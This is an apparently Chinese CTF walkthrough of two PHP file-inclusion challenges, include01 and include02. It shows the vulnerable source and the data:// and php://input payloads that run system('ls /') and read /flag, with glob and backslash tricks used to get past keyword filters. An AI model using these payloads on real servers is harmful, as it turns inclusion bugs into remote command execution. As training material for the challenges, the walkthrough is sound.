前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >青少年CTF-qsnctf-Web-include01&include02(多种方法-知识点较多-建议收藏!)

青少年CTF-qsnctf-Web-include01&include02(多种方法-知识点较多-建议收藏!)

作者头像
用户8909609
发布2023-12-24 08:17:26
1260
发布2023-12-24 08:17:26
举报
文章被收录于专栏:BM CTFBM CTF

PHP常见伪协议

php://filter是PHP中独有的一种协议,它是一种过滤器,可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如base64编码处理,rot13处理等。官方解释为:php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。

php://data协议是PHP中的一种特殊协议,可以在包含函数中被用来执行一些特殊的操作。它没有条件限制,但仅能用于在CTF(Capture The Flag)中读取本地文件,且不受allow_url_fopen与allow_url_include的影响。

php://input是PHP提供的一个伪协议,允许开发者访问POST请求的原始内容。它是一个只读流,可以获取POST请求数据的协议。当enctype="multipart/form-data"时, php://input是无效的。

include01

题目环境:

image.png
image.png

出题人:末心 题目难度:★ 题目描述:你能否获取Flag呢,flag格式为:qsnctf{xxx}。

image.png
image.png
代码语言:javascript
复制
<?php
  error_reporting(0);
if (isset($_GET['file'])) {
  if (!strpos($_GET["file"], "flag")) {
    include $_GET["file"];
  } else {
    echo "Hack!!!";
  }
} else {
  highlight_file(__FILE__);
}
?>
<hr>
你能否获取Flag?<br>
<a href="hello.php">hello</a>
你能否获取Flag?
hello
代码语言:javascript
复制
PHP代码审计
1.给了一个参数file
2.strpos函数用来查找flag在字符串中第一次出现的位置
3.!是取反就是相反的意思 如果存在flag关键字那么就会显示Hack!!!
那么简单来说就是我们的flag关键字被过滤了!
绕过方式也有很多种 这里就主要通过字符来绕过这个flag关键字过滤

filter伪协议

查看index.php的内容 并将其内容以base64编码形式显示出来

?file=php://filter/read=convert.base64-encode/resource=index.php

image.png
image.png
image.png
image.png

解码之后也就是题目的源码

查看flag的内容 并将其内容以base64编码显示出来 使用*号绕过flag关键字过滤 意为查看f开头的所有文件

?file=php://filter/read=convert.base64-encode/resource=f*

image.png
image.png

没有显示任何内容 显然filter协议是不适合这道题目的

data伪协议

第一种解法

使用data协议获取本地内容 phpinfo()打开PHP配置信息

?file=data://text/plain,<?php phpinfo();?>

image.png
image.png

成功执行 Ctrl+F搜索flag在配置信息中的位置

image.png
image.png

在第五条信息中发现了flag的存在

第二种解法

使用data伪协议获取本地内容 并且调用外部执行命令 system外部执行命令

列出根目录下的所有目录以及文件

?file=data://text/plain,<?php system("ls /");?>

image.png
image.png
代码语言:javascript
复制
bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var

在根目录下发现了flag文件的存在

查看根目录下的flag文件内容 f*代表f开头的所有文件 因为根目录下只有flag这一个f开头的文件 所以查看的就是flag文件的内容咯

?file=data://text/plain,<?php system("cat /f*");?>

image.png
image.png

input伪协议

需要的工具 火狐浏览器 Max HacKBar插件

第一种解法

访问POST请求的原始内容 phpinfo()查看PHP的配置信息

URL网页链接就是GET请求数据

?file=php://input

POST请求数据

<?php phpinfo();?>

image.png
image.png

成功执行 Ctrl+F搜索flag在配置信息中的位置

image.png
image.png

在第五条信息中发现了flag的存在

第二种解法

使用input伪协议访问POST请求的原始内容 并且调用外部执行命令 system外部执行命令

URL网页链接就是GET请求数据

?file=php://input

POST请求数据

列出根目录下的所有目录以及文件

<?php system("ls /");?>

image.png
image.png
代码语言:javascript
复制
 bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var  

在根目录下发现flag文件的存在

查看根目录下的flag文件内容 通过fl\ag绕过flag关键字过滤

GET请求数据不用管了

POST请求数据

<?php system("cat /fl\ag");?>

image.png
image.png

得到flag: qsnctf{5f6cef0f-f83c-4b60-a0a8-e97c755ae457}

include02

题目环境:

image.png
image.png

出题人:末心 题目难度:★ 题目描述:这道题修改了一些东西哦!你还能做出来吗,flag格式为:qsnctf{xxx}。

image.png
image.png

禁用了input伪协议

输入框随便输入值进入check.php界面

image.png
image.png

删除file参数查看check.php源代码

image.png
image.png
代码语言:javascript
复制
<?php
  error_reporting(0);
if (isset($_GET['file'])) {
  if (!strpos($_GET["file"], "input") && !strpos($_GET["file"], "flag")) {
    include $_GET["file"];
  } else {
    echo "Hack!!!";
  }
} else {
  highlight_file(__FILE__);
}
?>
<hr>
你能否获取Flag?<br>
<a href="hello.php">hello</a>
你能否获取Flag?
hello
代码语言:javascript
复制
PHP代码审计
相比include01 这道题目多增加了一个过滤 
过滤了input关键字 进而导致input伪协议不能使用

filter伪协议

查看flag的内容 并将其内容以base64编码形式显示出来 f???代替flag 意思是文件名f开头并且文件名是4位的文件

?file=php://filter/read=convert.base64-encode/resource=f???

image.png
image.png

filter伪协议依旧是不适用此题目

由于input关键字被过滤导致input伪协议不能使用 就直接使用data伪协议了

data伪协议

第一种解法

使用data伪协议获取本地内容 phpinfo()打开PHP配置信息

?file=data://text/plain,<?php phpinfo();?>

image.png
image.png

成功执行 Ctrl+F搜索flag在配置信息中的位置

image.png
image.png

在第五条信息中发现了flag

第二种解法

使用data协议获取本地内容 并且调用外部执行命令 system外部执行命令

列出根目录下的所有目录以及文件

?file=data://text/plain,<?php system("ls /");?>

image.png
image.png
代码语言:javascript
复制
bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var

在根目录下发现了flag文件的存在

查看根目录下的flag文件内容 f???代替flag 意思是文件名f开头并且文件名是4位的文件

?file=data://text/plain,<?php system("cat /f???");?>

image.png
image.png

得到flag: qsnctf{0ed8d987-ba51-490e-9775-e0974ccf0a06}

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-12-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • PHP常见伪协议
  • include01
  • include02
相关产品与服务
代码审计
代码审计(Code Audit,CA)提供通过自动化分析工具和人工审查的组合审计方式,对程序源代码逐条进行检查、分析,发现其中的错误信息、安全隐患和规范性缺陷问题,以及由这些问题引发的安全漏洞,提供代码修订措施和建议。支持脚本类语言源码以及有内存控制类源码。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档